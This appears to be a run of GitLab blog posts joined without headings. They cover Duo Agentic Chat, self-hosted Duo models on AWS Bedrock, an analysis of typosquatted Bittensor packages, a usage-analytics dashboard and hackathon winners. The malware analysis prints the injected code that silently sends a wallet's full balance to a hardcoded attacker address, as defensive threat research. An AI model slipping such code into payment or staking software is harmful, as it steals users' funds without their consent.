Custom rules in Duo Agentic Chat IDEs are the first iteration and we will cover more GitLab Duo Agent Platform use cases in the future, such as Duo Code Review and custom rules for agents and flows (follow this issue).

There are many more use cases to explore. What are your most efficient rules? Share your rules and feedback in the product epic.

In addition to being available in a variety of IDEs, Agentic Chat is available directly within the GitLab UI for GitLab users with the Duo Pro or Enterprise add-on. Adding Agentic Chat to the GitLab UI helps make this experience more accessible to all GitLab users and easy to integrate into your workflows. To open Agentic Chat:

1. Navigate to any Group or Project in your GitLab instance.

2. Look for the GitLab Duo Chat button (typically in the top right corner).

3. Click to open the chat panel.

4. Toggle to Agentic mode (Beta) in the chat window.

Pro tip: Keep the chat panel open as you work — it maintains context and can help you across different pages and projects.

To get familiar with Agentic Chat, ask about the tools it can work with. This is like using the help command for a command-line tool.

What tools do you have access to? 

The output above shows us that Agentic Chat has access to a variety of GitLab APIs and data that will allow it to perform complex tasks across the software development lifecycle.

Issue management made easy

GitLab Duo Agentic Chat can help you keep track of issues, find specific ones, understand the status, and take actions based on conversations in these issues. Instead of navigating through pages and pages of issues, you ask Agentic Chat about the issues in a project. It will respond with high-level information about the issues, including the priority, labels, and the status of the issue.

For a specific issue, Agentic Chat will fetch the issue details, provide a concise summary, highlight recent activity, and share the goal of the issue. This is particularly helpful when you need context or updates before a meeting or are researching the issue before picking it up.

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1107479358?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="Agentic Chat UI Issue Management"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

<p></p>

You can also try more complex queries if you're looking to better understand a project overall. And once you've discovered these issues, you can make changes to them like adding labels, updating milestones, and re-organizing them.

For example, maybe you're looking for all the issues that are database- or performance-related in order to prioritize them in the next sprint. You could task Agentic Chat with the following prompt.

Analyze all issues labeled 'performance' and 'database' - group them by component and show me which ones have had the most discussion activity in the last 30 days.

Agentic Chat will respond with issues grouped by the backend and frontend component of a project, identify the issues with significant discussion activity, and provide insights on these kinds of issues (e.g., when were most of these issues created or which component issues have more active discussion).

Create an issue template for bug reports that includes:

- Steps to reproduce

- Expected behavior vs actual behavior

- Environment details (browser, OS, GitLab version)

- Severity assessment

- Screenshots/error logs section

Name it "bug_report.md" and format it as a proper GitLab issue template

CI/CD support

This is where GitLab Duo Agentic Chat truly becomes your debugging superhero. We've all been there: a pipeline fails and you have to click through job logs trying to understand what went wrong. Agentic Chat can do more than just explain the failure to you and suggest recommendations. After reviewing the failed pipeline logs, Agentic Chat can suggest a fix and also add the fix to a merge request you are working on.

Let's say you have a merge request adding a new feature, but the pipeline is failing. Instead of clicking through each failed job and trying to piece together what's wrong, you can ask Agentic Chat to investigate.

Agentic Chat will analyze the pipeline, check the job logs, and explain that the tests are failing because of missing test data or configuration issues. But here's where it gets even more powerful — you don't have to stop at understanding the problem. Agentic Chat can also act on the advice it presents and add commits to fix the pipeline in the merge request.

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1107495269?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="GitLab Agentic Chat CI/CD Fix"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

Building complex prompts

GitLab Duo Agentic Chat can also help you craft your prompts. Let's say that you're running a bug bash with your team and want to triage all possible issues that might be bug reports.

If you use a simple prompt like below, Agentic Chat will come up with ways to find the related issues, such as searching for terms or pattern matching:

I need help writing an effective prompt to find all possible bug report issues in my GitLab project, including those that might not be properly labeled as "bug".

Often you can use the recommendations in Agentic Chat to build a more in-depth prompt based on what you're looking for:

I need help writing an effective prompt to find all possible bug report issues in my GitLab project, including those that might not be properly labeled as "bug". Please help me create a prompt that will:


1. Search for common bug-related terminology beyond just the word "bug"

2. Identify patterns that indicate bug reports (like "steps to reproduce", "expected vs actual behavior")

3. Find technical issues that might be bugs (errors, crashes, performance problems)

4. Catch user-reported problems that could be bugs but use different language


The prompt should ensure we don't miss any potential bugs regardless of how they're described or labeled. What would be the most effective approach and search strategy for this?

Once you have the prompt and you're able to search for the issues you're looking for, that's where Agentic Chat really shines. Agentic Chat can triage and update those issues for you to prepare them for the bug bash:

Find and triage all bug-related issues for our bug bash event. Execute these steps:


1. Search for potential bugs using individual searches:
   - Core terms: "bug", "fix", "error", "broken", "issue", "problem", "not working"
   - Bug patterns: "steps to reproduce", "expected behavior", "regression"
   - Technical issues: "exception", "crash", "console error", "500 error", "404 error"
   - Performance: "slow", "freezes", "unresponsive"

2. For each issue found:
   - Add the "Event - Bug Bash" label
   - Assign appropriate bug severity label (critical/high/medium/low)
   - Add to the current bug bash milestone
   - If missing "bug" label, add it

3. Create a triage list organized by:
   - Critical bugs (data loss, crashes, security)
   - High priority (blocking features, frequent errors)
   - Medium priority (workarounds available)
   - Low priority (minor UI issues)

Search both open and closed issues. Focus on actionable bugs that can be fixed during the bug bash, excluding enhancement requests. Provide a summary table with issue numbers, titles, and assigned severity for the bug bash team.

You can ask Agentic Chat to create a bug report template, which increases efficiency and eliminates some manual effort. Also, future bug reports will have the structure and labels you need for more efficient triaging.

Tips for effective prompting

When you're working with GitLab Duo Agentic Chat, it's important to phrase your requests with action-oriented verbs like "create," "update," "fix," or "assign." This will trigger the agentic tools to take action rather than summarize or share information with you. One approach before taking agentic actions can be to request summaries and analyses — the way we did with the issues about bugs. Then, see what gets returned before taking actions like applying a label or adding to a milestone.

It's also important to give clear criteria when asking for bulk operations. Specify exact conditions like "all issues with the 'bug' label created in the last week" or "merge requests waiting for review for more than 3 days." The more specific you are, the more accurate and helpful the results will be.

Since Agentic Chat has the ability to maintain context, you can chain requests and build on previous requests. After getting an initial set of issues, you might ask "From those issues, which ones are unassigned?" and then follow up with "Assign the high-priority ones to the backend team." This allows you to refine and act on information iteratively.

We recommend starting with an open-ended request and allowing GitLab Duo to help you look for patterns or similar problems across your project. That will help you catch any problem that you may have missed or understand the scope of the challenge before taking action.

Get hands-on with GitLab Duo Agentic Chat

We hope all the ideas above give you some thoughts on getting started with Agentic Chat, but we are even more excited to see all our users' ideas come to life with it. To try the Agentic Chat UI experience in your next project, sign up for a free trial of GitLab Ultimate with Duo Enterprise. You can learn more about GitLab Duo Agentic Chat on our documentation page, which also details how to enable Agentic Chat in the GitLab UI.

In this article, we'll walk through the implementation of GitLab Duo Self-Hosted models. This comprehensive guide helps organizations needing to meet strict data sovereignty requirements while still leveraging AI-powered development. The focus is on using models hosted on AWS Bedrock rather than setting up an LLM serving solution like vLLM. However, the methodology can be applied to models running in your own data center if you have the necessary capabilities.

Why GitLab Duo Self-Hosted?

GitLab Duo Self-Hosted allows you to deploy GitLab's AI capabilities entirely within your own infrastructure, whether that's on-premises, in a private cloud, or within your secure environment.

Key benefits include:

• Complete Data Privacy and Control: Keep sensitive code and intellectual property within your security perimeter, ensuring no data leaves your environment.

• Model Flexibility: Choose from a variety of models tailored to your specific performance needs and use cases, including Anthropic Claude, Meta Llama, Mistral families, and OpenAI GPT families.

• Compliance Adherence: Meet regulatory requirements in highly regulated industries where data must remain within specific geographical boundaries.

• Customization: Configure which GitLab Duo features use specific models to optimize performance and cost.

• Deployment Flexibility: Deploy in fully air-gapped environments, on-premises, or in secure cloud environments.

Architecture overview

The GitLab Duo Self-Hosted solution consists of three core components:

1. Self-Managed GitLab instance: Your existing GitLab instance where users interact with GitLab Duo features.

2. AI Gateway: A service that routes requests between GitLab and your chosen LLM backend.

3. LLM backend: The actual AI model service, which, in this article, will be AWS Bedrock.

Note: You can use another serving platform if you are running on-premises or using another cloud provider.

Prerequisites

Before we begin, you'll need:

• A GitLab Premium or Ultimate instance (Version 17.10 or later)

  • We strongly recommend using the latest version of GitLab as we continuously deliver new features.

• A GitLab Duo Enterprise add-on license

• AWS account with access to Bedrock models or your API key and credentials needed to query your LLM Serving model

Note: If you aren't a GitLab customer yet, you can sign up for a free trial of GitLab Ultimate, which includes GitLab Duo Enterprise.

Implementation steps

1. Install the AI Gateway

The AI Gateway is the component that routes requests between your GitLab instance and your LLM serving infrastructure — here that is AWS Bedrock. It can run in a Docker image. Follow the instructions from our installation documentation to get started.

For this example, using AWS Bedrock, you also must pass the AWS Key ID and Secret Access Key along with the AWS region.

AIGW_TAG=self-hosted-v18.1.2-ee`

docker run -d -p 5052:5052 \

  -e AIGW_GITLAB_URL=<your_gitlab_instance> \

  -e AIGW_GITLAB_API_URL=https://<your_gitlab_domain>/api/v4/ \

  -e AWS_ACCESS_KEY_ID=$AWS_KEY_ID

  -e AWS_SECRET_ACCESS_KEY=$AWS_SECRET_ACCESS_KEY \

  -e AWS_REGION_NAME=$AWS_REGION_NAME \

registry.gitlab.com/gitlab-org/modelops/applied-ml/code-suggestions/ai-assist/model-gateway:$AIGW_TAG \

Here is the AIGW_TAG list.

In this example we use Docker, but it is also possible to use the Helm chart. Refer to the installation documentation for more information.

2. Configure GitLab to access the AI Gateway

Now that the AI gateway is running, you need to configure your GitLab instance to use it.

• On the left sidebar, at the bottom, select Admin.

• Select GitLab Duo.

• In the GitLab Duo section, select Change configuration.

• Under Local AI Gateway URL, enter the URL for your AI gateway and port for the container (e.g., https://ai-gateway.example.com:5052).

• Select Save changes.

3. Access models from AWS Bedrock

Next, you will need to request access to the available models on AWS Bedrock.

• Navigate to your AWS account and Bedrock.

• Under Model access, select the models you want to use and follow the instructions to gain access.

You can find more information in the AWS Bedrock documentation.

4. Configure the self-hosted model

Now, let's configure a specific AWS Bedrock model for use with GitLab Duo.

• On the left sidebar, at the bottom, select Admin.

• Select GitLab Duo Self-Hosted.

• Select Add self-hosted model.

• Fill in the fields:

  • Deployment name: A name to identify this model configuration (e.g., "Mixtral 8x7B")
  • Platform: Choose AWS Bedrock
  • Model family: Select a model, for example here "Mixtral"
  • Model identifier: bedrock/model-identifier from the supported list.

• Select Create self-hosted model.

5. Configure GitLab Duo features to use your self-hosted model

After configuring the model, assign it to specific GitLab Duo features.

• On the left sidebar, at the bottom, select Admin.

• Select GitLab Duo Self-Hosted.

• Select the AI-powered features tab.

• For each feature (e.g., Code Suggestions, GitLab Duo Chat) and sub-feature (e.g., Code Generation, Explain Code), select the model you just configured from the dropdown menu.

For example, you might assign Mixtral 8x7B to Code Generation tasks and Claude 3 Sonnet to the GitLab Duo Chat feature.

Check out the requirements documentation to select the right model for the use case from the models compatibility list per Duo feature.

Verifying your setup

To ensure that your GitLab Duo Self-Hosted implementation with AWS Bedrock is working correctly, perform these verification steps:

1. Run the health check

After running the health check of your model to be sure that it’s up and running, Return to the GitLab Duo section from the Admin page and click on Run health check. This will verify if:

• The AI gateway URL is properly configured.

• Your instance can connect to the AI gateway.

• The Duo Licence is activated.

• A model is assigned to Code Suggestions — as this is the model used to test the connection.

If the health check reports issues, refer to the troubleshooting guide for common errors.

2. Test GitLab Duo features

Try out a few GitLab Duo features to ensure they're working:

• In the UI, open GitLab Duo Chat and ask it a question.

• Open the web IDE

  • Create a new code file and see if Code Suggestions appears.
  • Select a code snippet and use the /explain command to receive an explanation from Duo Chat.

3. Check AI Gateway logs

Review the AI gateway logs to see the requests coming to the gateway from the selected model:

In your terminal, run:

docker logs <ai-gateway-container-id>

Optional: In AWS, you can activate CloudWatch and S3 as log destinations. Doing so would enable you to see all your requests, prompts, and answers in CloudWatch.

Warning: Keep in mind that activating these logs in AWS logs user data, which may not comply with privacy rules.

And here you have full access to using GitLab Duo's AI features across the platform while retaining complete control over the data flow operating within the secure AWS cloud.

Next steps

Selecting the right model for each use case

The GitLab team actively tests each model's performance for each feature and provides tier ranking of model's performance and suitability depending on the functionality:

• Fully compatible: The model can likely handle the feature without any loss of quality.

• Largely compatible: The model supports the feature, but there might be compromises or limitations.

• Not compatible: The model is unsuitable for the feature, likely resulting in significant quality loss or performance issues.

As of this writing, most GitLab Duo features can be configured with Self Hosted. The complete availability overview is available in the documentation.

Going beyond AWS Bedrock

While this guide focuses on AWS Bedrock integration, GitLab Duo Self-Hosted supports multiple deployment options:

1. On-premises with vLLM: Run models locally with vLLM for fully air-gapped environments.

2. Azure OpenAI Service: Similar to AWS Bedrock, you can use Azure OpenAI for models like GPT-4.

Summary

GitLab Duo Self-Hosted provides a powerful solution for organizations that need AI-powered development tools while maintaining strict control over their data and infrastructure. By following this implementation guide, you can deploy a robust solution that meets security and compliance requirements without compromising on the advanced capabilities that AI brings to your software development lifecycle.

For organizations with stringent security and compliance needs, GitLab Duo Self-Hosted strikes the perfect balance between innovation and control, allowing you to harness the power of AI while keeping your code and intellectual property secure within your boundaries.

Would you like to learn more about implementing GitLab Duo Self-Hosted in your environment? Please reach out to a GitLab representative or visit our documentation for more detailed information.

Our investigation began when GitLab's automated package monitoring system flagged suspicious activity related to popular Bittensor packages. We discovered multiple typosquatted variations of legitimate Bittensor packages, each designed to steal cryptocurrency from unsuspecting developers and users.

The identified malicious packages were all published within a 25-minute window on August 6, 2025:

• bitensor@9.9.4 (02:52 UTC)
• bittenso-cli@9.9.4 (02:59 UTC)
• qbittensor@9.9.4 (03:02 UTC)
• bitensor@9.9.5 (03:15 UTC)
• bittenso@9.9.5 (03:16 UTC)

All packages were designed to mimic the legitimate bittensor and bittensor-cli packages, which are core components of the Bittensor decentralized AI network.

Technical analysis: How the theft occurs

Our analysis revealed a carefully crafted attack vector where the attackers modified legitimate staking functionality to steal funds. The malicious packages contain a hijacked version of the stake_extrinsic function in bittensor_cli/src/commands/stake/add.py.

Where users expect a normal staking operation, the attackers inserted malicious code at line 275 that silently diverts all funds to their wallet:

result = await transfer_extrinsic(
  subtensor=subtensor,
  wallet=wallet,
  destination="5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR",
  amount=amount,
  transfer_all=True,
  prompt=False
)

This malicious injection completely subverts the staking process:

• Silent execution: Uses prompt=False to bypass user confirmation
• Complete wallet drain: Sets transfer_all=True to steal all available funds, not just the staking amount
• Hardcoded destination: Routes all funds to the attacker's wallet address
• Hidden in plain sight: Executes during what appears to be a normal staking operation

The attack is particularly insidious as users believe they're staking tokens to earn rewards, but instead, the modified function empties their entire wallet.

Why target staking functionality?

The attackers appear to have specifically targeted staking operations for calculated reasons. In blockchain networks like Bittensor, staking is when users lock up their cryptocurrency tokens to support network operations, earning rewards in return, similar to earning interest on a deposit.

This makes staking an ideal attack vector:

1. High-value targets: Users who stake typically hold substantial cryptocurrency holdings, making them lucrative victims.
2. Required wallet access: Staking operations require users to unlock their wallets and provide authentication—giving the malicious code exactly what it needs to drain funds.
3. Expected network activity: Since staking naturally involves blockchain transactions, the additional malicious transfer doesn't immediately raise suspicions.
4. Routine operations: Experienced users stake regularly, creating familiarity that breeds complacency and reduces scrutiny.
5. Delayed detection: Users might initially assume any balance changes are normal staking fees or temporary holds, delaying discovery of the theft.

By hiding malicious code within legitimate-looking staking functionality, the attackers exploited both the technical requirements and user psychology of routine blockchain operations.

Following the money

GitLab's Vulnerability Research team traced the cryptocurrency flows to understand the full scope of this operation. The primary destination wallet 5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR served as a central collection point before funds were distributed through a network of intermediary wallets.

The money laundering network

Our analysis revealed a multi-hop laundering scheme:

1. Primary collection: Stolen funds initially arrive at 5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR
2. Distribution network: Funds are quickly moved to intermediate wallets including:
   • 5HpsyxZKvCvLEdLTkWRM4d7nHPnXcbm4ayAsJoaVVW2TLVP1
   • 5GiqMKy1kAXN6j9kCuog59VjoJXUL2GnVSsmCRyHkggvhqNC
   • 5ER5ojwWNF79k5wvsJhcgvWmHkhKfW5tCFzDpj1Wi4oUhPs6
   • 5CquBemBzAXx9GtW94qeHgPya8dgvngYXZmYTWqnpea5nsiL
3. Final consolidation: All paths eventually converge at 5D6BH6ai79EVN51orsf9LG3k1HXxoEhPaZGeKBT5oDwnd2Bu
4. Cash-out endpoint: Final destination appears to be 5HDo9i9XynX44DFjeoabFqPF3XXmFCkJASC7FxWpbqv6D7QQ

The typosquatting strategy

The attackers employed a typosquatting strategy that exploits common typing errors and package naming conventions:

• Missing characters: bitensor instead of bittensor (missing 't')
• Truncation: bittenso instead of bittensor (missing final 'r')
• Version mimicking: All packages used version numbers (9.9.4, 9.9.5) that closely match legitimate package versions

This approach maximizes the chance of installation through developer typos during pip install commands and copy-paste errors from documentation.

Looking ahead: The future of supply chain security

GitLab continues to invest in proactive security research to identify and neutralize threats before they impact our community. Our automated detection system works around the clock to protect the software supply chain that powers modern development.

The swift detection and analysis of this attack demonstrate the value of proactive security measures in combating sophisticated threats. By sharing our findings, we aim to strengthen the entire ecosystem's resilience against future attacks.

Indicators of compromise

Timeline

To help our customers maximize their AI investments, we developed the GitLab Duo Analytics solution as part of our Duo Accelerator program — a comprehensive, customer-driven solution that transforms raw usage data into actionable business insights and ROI calculations. This is not a GitLab product, but rather a specialized enablement tool we created to address immediate analytics needs while organizations transition toward comprehensive AI productivity measurement.

This foundation enables broader AI transformation. For example, organizations can use these insights to optimize license allocation, identify high-value use cases, and build compelling business cases for expanding AI adoption across development teams.

A leading financial services organization partnered with a GitLab customer success architect through the Duo Accelerator program to gain visibility into their GitLab Duo Enterprise investment. Together, we implemented a hybrid analytics solution that combines monthly data collection with real-time API integration, creating a scalable foundation for measuring AI productivity gains and optimizing license utilization at enterprise scale.

The challenge: Measuring AI ROI in enterprise development

Before implementing any analytics solution, it's essential to understand your AI measurement landscape.

Consider:

• What GitLab Duo features need measurement? (code suggestions, chat assistance, security scanning)?

• Who are your AI users? (developers, security teams, DevOps engineers)?

• What business metrics matter? (time savings, productivity gains, cost optimization)?

• How does your current data collection work (manual exports, API integration, existing tooling)?

Use this stage to define your:

• ROI measurement framework

• Key performance indicators (KPIs)

• Data collection strategy

• Stakeholder reporting requirements

Sample ROI measurement framework

Step-by-step implementation guide

Important: The solution below describes an open source approach that you can deploy in your own environment. It is NOT a commercial product from GitLab that you need to purchase. You should be able download, customize, and run this solution free of charge.

Prerequisites

Before starting, ensure you have:

• Python 3.8+ installed

• Node.js 14+ and npm (for React dashboard)

• GitLab instance with Duo enabled

• GitLab API token with read permissions

• Basic terminal/command line knowledge

1: Initial setup and configuration

Let's set up the project environment by first cloning the repository.

git clone https://gitlab.com/gl-demo-ultimate-pmeresanu/gitlab-graphql-api.git
cd gitlab-graphql-api

Then, install Python dependencies.

pip install -r requirements.txt

# What this does: Sets up the Python environment with all necessary libraries for data collection and server operation.

2: Configure GitLab API access

Create a .env file in the root directory to store your GitLab credentials.

GitLab configuration

GITLAB_URL: https://your-gitlab-instance.com
GITLAB_TOKEN: your_personal_access_token
GROUP_PATH: your-group/subgroup

Data collection settings

NUMBER_OF_ITERATIONS: 20000
SERVICE_PING_DATA_ENABLED: true
GRAPHQL_DATA_ENABLED: true
DUO_DATA_ENABLED: true
AI_METRICS_ENABLED: true

What these settings control:

• GITLAB_URL: Your GitLab instance URL

• GITLAB_TOKEN: Personal access token for API authentication (needs read_api scope)

• GROUP_PATH: The group/namespace to collect data from

• Various flags control which data types to collect

3: Understanding and running data collection

The heart of the solution is the ai_raw_data_collection.py script.

This script connects to GitLab's APIs and extracts AI usage data.

What this script does:

• Connects to multiple GitLab GraphQL APIs in parallel

• Collects code suggestion events, user metrics, and aggregated statistics

• Processes data in memory-efficient chunks

• Exports everything to .csv files for dashboard consumption

Run the data collection.

python scripts/ai_raw_data_collection.py

Expected output:

 2025-08-04 11:30:45 - INFO - Starting AI raw data collection...
 2025-08-04 11:30:46 - INFO - Running 4 data collection tasks concurrently...
 2025-08-04 11:31:15 - INFO - Processed chunk 1 (1000 rows)
 2025-08-04 11:32:30 - INFO - Successfully wrote ai_code_suggestions_data_raw.csv
 2025-08-04 11:33:00 - INFO - Retrieved 500 eligible users
 2025-08-04 11:33:30 - INFO - All data collection tasks completed in 165.2 seconds

APIs used by the data collection script

1. AI usage data API (aiUsageData)

# Fetches individual code suggestion events
query: |
  {
    group(fullPath: "your-group") {
      aiUsageData {
        codeSuggestionEvents {
          event         # ACCEPTED or SHOWN
          timestamp     # When it happened
          language      # Programming language
          suggestionSize # SINGLE_LINE or MULTI_LINE
          user { username }
        }
      }
    }
  }
# Purpose: Tracks every code suggestion shown or accepted by developers

2. GitLab Self-Managed add-on users API

# Gets licensed user information
query: |
  {
    selfManagedAddOnEligibleUsers(
      addOnType: DUO_ENTERPRISE
      filterByAssignedSeat: "Yes"
    ) {
      user {
        username
        lastDuoActivityOn
      }
    }
  }
# Purpose: Identifies who has licenses and when they last used Duo

3. AI metrics API

Retrieve aggregated metrics.

query: |
  {
    aiMetrics(from: "2024-01-01", to: "2024-06-30") {
      codeSuggestions {
        shownCount
        acceptedCount
      }
      duoChatContributorsCount
      duoAssignedUsersCount
    }
  }
# Purpose: Gets pre-calculated metrics for trend analysis

4. Service Ping API (REST)

url: "{GITLAB_URL}/api/v4/usage_data/service_ping"
# Purpose: Collects instance-wide usage statistics

4: Organizing the collected data

After data collection completes, organize the CSV files.

Create monthly data directory.

mkdir -p data/monthly/$(date +%Y-%m)

Move generated CSV files.

mv *.csv data/monthly/$(date +%Y-%m)/

Generated files:

• ai_code_suggestions_data_raw.csv - Individual suggestion events
• duo_licensed_vs_active_users.csv - User license and activity data
• ai_metrics_data.csv - Aggregated metrics over time
• service_ping_data.csv - System-wide statistics

5: Configure the dashboard

Edit config.json to point to your data.

config:
  dataPath: "./data/monthly/2024-06"
  csvFiles:
    users: "duo_licensed_vs_active_users.csv"
    suggestions: "ai_code_suggestions_data_raw.csv"
  currentDataPeriod: "2024-06"

What this configures:

• Where to find the CSV data files

• Which period of data to display

6: Launch the dashboard server

The simple_csv_server.py file creates a web server that reads your CSV data and serves it through a dashboard.

What this server does:

• Reads CSV files from the configured directory
• Calculates metrics like utilization rates and costs
• Serves an HTML dashboard with charts
• Provides a JSON API for the React dashboard

Start the server.

python simple_csv_server.py

Console output:

Starting CSV Dashboard Server...
Loading data from:
   - `./data/monthly/2024-06/duo_licensed_vs_active_users.csv`
   - `./data/monthly/2024-06/ai_code_suggestions_data_raw.csv`

Dashboard should be available at: http://localhost:8080.

API endpoint at: http://localhost:8080/api/dashboard.

7: Access your analytics dashboard

Open your browser and navigate to: http://localhost:8080.

You'll see:

• License utilization: Total licensed users vs. active users (together with code suggestion analytics)

• Duo Chat analytics: Unique Duo Chat users, average Chat events over 90 days, and Chat adoption rate
• Duo engagement analytics: Categorizing Duo usage for a group of users as Power (10+ suggestions), Regular (5-9), or Light (1-4) based on usage patterns

• Usage analytics: Code suggestions by programming language (language coverage distribution), Code suggestions language performance analytics (accepted vs rejected rate)

<p></p>

• Weekly Duo Chat trends: Duo Chat usage patterns

8: (Optional) Launch the React dashboard

For a more interactive experience, you can also run the React dashboard.

Install React dependencies.

cd duo-roi-dashboard
npm install

Start the React app.

npm start

What the React dashboard provides:

• Modern, responsive UI with ,aterial design
• Real-time data refresh
• Dark mode support
• Enhanced visualizations
• Export capabilities

Putting it all together

To demonstrate the power of this integrated analytics solution, let's walk through a complete end-to-end implementation journey — from initial deployment to fully automated ROI measurement.

Start by deploying the containerized solution in your environment using the provided Docker configuration. Within minutes, you'll have both the analytics API and React dashboard running locally.

The hybrid data architecture approach immediately begins collecting metrics from your existing monthly CSV exports while establishing real-time GraphQL connections to your GitLab instance.

Automation through Python scripting

The real power emerges when you leverage Python scripting to automate the entire data collection and processing workflow. The solution includes comprehensive Python scripts that can be easily customized and scheduled.

GitLab CI/CD integration

For enterprise-scale automation, integrate these Python scripts into scheduled GitLab CI/CD pipelines. This approach leverages your existing GitLab infrastructure while ensuring consistent, reliable data collection:

# .gitlab-ci.yml example

duo_analytics_collection:
  stage: analytics
  script:
    - python scripts/enhanced_duo_data_collection.py
    - python scripts/metric_aggregations.py
    - ./deploy_dashboard_updates.sh
  schedule:
    - cron: "0 2 1 * *"  # Monthly on 1st at 2 AM
  only:
    - schedules

This automation strategy transforms manual data collection into a self-sustaining analytics engine. Your Python scripts execute monthly via GitLab pipelines, automatically collecting usage data, calculating ROI metrics, and updating dashboards — all without manual intervention.

Once automated, the solution operates seamlessly: Scheduled pipelines execute Python data collection scripts, process GraphQL responses into business metrics, and update dashboard data stores. You can watch as the dashboard populates with real usage patterns: code suggestion volumes by programming language, user adoption trends across teams, and license utilization rates that reveal optimization opportunities.

The real value emerges when you access the ROI Overview dashboard. Here, you'll see concrete enagagement metrics metrics which can be converted into business impact for your organisation — perhaps discovering that your active Duo users are generating 127% monthly ROI through time savings and productivity gains, while 23% of your licenses remain underutilized. These insights immediately translate into actionable recommendations: expand licenses to high-performing teams, implement targeted training for underutilized users, and build data-driven business cases for broader AI adoption.

Why GitLab?

GitLab's comprehensive DevSecOps platform provides the ideal baseline for enterprise AI analytics and measurement. With native GraphQL APIs, flexible data access, and integrated AI capabilities through GitLab Duo, organizations can centralize AI measurement across the entire development lifecycle without disrupting existing workflows.

The solution's open architecture enables custom analytics solutions like the one developed through our Duo Accelerator program. GitLab's commitment to API-first design means you can extract detailed usage data, integrate with existing enterprise systems, and build sophisticated ROI calculations that align with your organization's specific metrics and reporting requirements.

Beyond technical capabilities, our approach ensures you're not just implementing tools — you're building sustainable AI adoption strategies. This purpose built solution emerging from the Duo Accelerator program exemplifies this approach, providing hands-on guidance, proven frameworks, and custom solutions that address real enterprise challenges like ROI measurement and license optimization.

As GitLab continues enhancing native analytics capabilities, this foundation becomes even more valuable. The measurement frameworks, KPIs, and data collection processes established through custom analytics solutions seamlessly transition to enhanced native features, ensuring your investment in AI measurement grows with GitLab's evolving solution.

Try GitLab Duo today

AI ROI measurement is just the beginning. With GitLab Duo's capabilities you can build out comprehensive analytics. With this you're not just tracking AI usage — you're building a foundation for data-driven AI optimization that scales with your organization's growth and evolves with GitLab's expanding AI capabilities.

The analytics solution developed through GitLab's Duo Accelerator program demonstrates how customer success partnerships can deliver immediate value while establishing long-term strategic advantages. From initial deployment to enterprise-scale ROI measurement, this solution provides the visibility and insights needed to maximize AI investments and drive sustainable adoption.

The combination of Python automation, GitLab CI/CD integration, and purpose-built analytics creates a competitive advantage that extends far beyond individual developer productivity. It enables strategic decision-making, optimizes resource allocation, and builds compelling business cases for continued AI investment and expansion.

The future of AI-powered development is data-driven, and it starts with measurement. Whether you're beginning your AI journey or optimizing existing investments, GitLab provides both the platform and the partnership needed to succeed.

Get started with GitLab Duo today with a free trial of GitLab Ultimate with Duo Enterprise.

This hackathon stood out because of a unique collaborative effort, bringing together Google Cloud, MongoDB, and GitLab. The aim was to cultivate an environment for AI development by combining Google Cloud's AI and cloud tools, MongoDB's intelligent data platform for AI, and GitLab's intelligent DevSecOps platform to ship more secure software faster with AI. This partnership allowed developers to integrate these powerful tools, reflecting real-world project dynamics.

This initiative sought to propel the developer community's growth, and collaboratively shape the future of DevSecOps. GitLab's specific focus in this hackathon was to inspire the creation of AI-enabled applications leveraging both GitLab and Google Cloud. Submissions were encouraged to include contributions to GitLab's product or develop functional components for the GitLab CI/CD Catalog.

Ultimately, the AI in Action Hackathon became a vibrant stage for developer innovation. It ignited fresh ideas and equipped participants with tangible gains, including new skills, impactful projects for their portfolios, and new professional connections.

Meet the winners: AI in action with GitLab

Congratulations to all participants, and specifically to the contest winners. Here's a highlight of the projects that stood out for their deep GitLab integration.

Pipeline Doctor: Proactive health for your CI/CD "As a software engineer, I frequently run into failed GitLab pipelines, often accompanied by cryptic and overwhelming logs. Pinpointing the root cause feels like searching for a needle in a haystack. Debugging becomes even more time-consuming when I have to rely on SREs for support." - the project's author

Pipeline Doctor addresses this by using AI for advanced root cause analysis, swiftly diagnosing pipeline anomalies. It analyzes logs and changes to pinpoint errors, and could even explain security issues or predict bottlenecks. This means substantial productivity gains for developers, reclaiming time from troubleshooting to focus on new features. It also makes pipelines more reliable, aligning with goals for 80% faster CI builds and 90% less system maintenance. This project signifies a shift from reactive troubleshooting to proactive health monitoring.

A truly impressive step towards more resilient pipelines.

Agentic CICD: The future of automated DevSecOps

"What if AI agents could handle most of the DevOps workload?”- the project’s author

Agentic CICD is set to profoundly elevate DevSecOps practices by automating code reviews, suggesting intelligent fixes, and optimizing testing and deployment decisions. These agents can evaluate real-time metrics, automate releases, and even initiate rollbacks without immediate human intervention, creating a self-improving feedback loop. This approach also enhances security by proactively identifying risks. The advantages for development teams are tangible: increased productivity, consistently higher software quality, and improved operational efficiency, accelerating development cycles and time-to-market. Agentic CICD cultivates a pipeline capable of self-healing and self-optimization, amplifying developer capabilities by automating routine tasks and providing intelligent insights.

This project truly showcases the next generation of intelligent automation.

Agent Anansi: Your intelligent companion in GitLab

“As someone deeply passionate about DevOps and AI, I was frustrated by the fragmented and reactive nature of traditional CI/CD workflows. While automation is widespread, intelligence is often lacking.“ - the project's author

